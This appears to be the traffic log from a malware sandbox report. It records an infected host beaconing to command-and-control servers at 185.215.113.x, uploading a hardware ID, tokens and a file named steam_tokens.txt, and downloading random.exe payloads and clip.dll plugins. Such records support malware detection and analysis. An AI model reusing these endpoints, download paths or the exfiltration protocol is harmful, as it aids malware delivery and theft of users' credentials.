42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file"------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="message"ybncbhylepme------DBAEHCGHIIIDHIECFHJD--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEBKKEGDBFIIEBFHIEHC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /Fru7Nk9/Plugins/clip.dll HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 30 33 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005203011&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /Fru7Nk9/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 30 34 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005204011&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005217001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005218001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 10 Nov 2024 03:45:33 GMTIf-None-Match: "67302c5d-1b0000"
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build"mars------DHCAECGIEBKJKEBGDHDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 31 39 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005219031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 32 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005220001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build"mars------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build"mars------EGIIIECBGDHJJKFIDAKJ--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="build"mars------KJDGIJECFIEBFIDHCGHD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
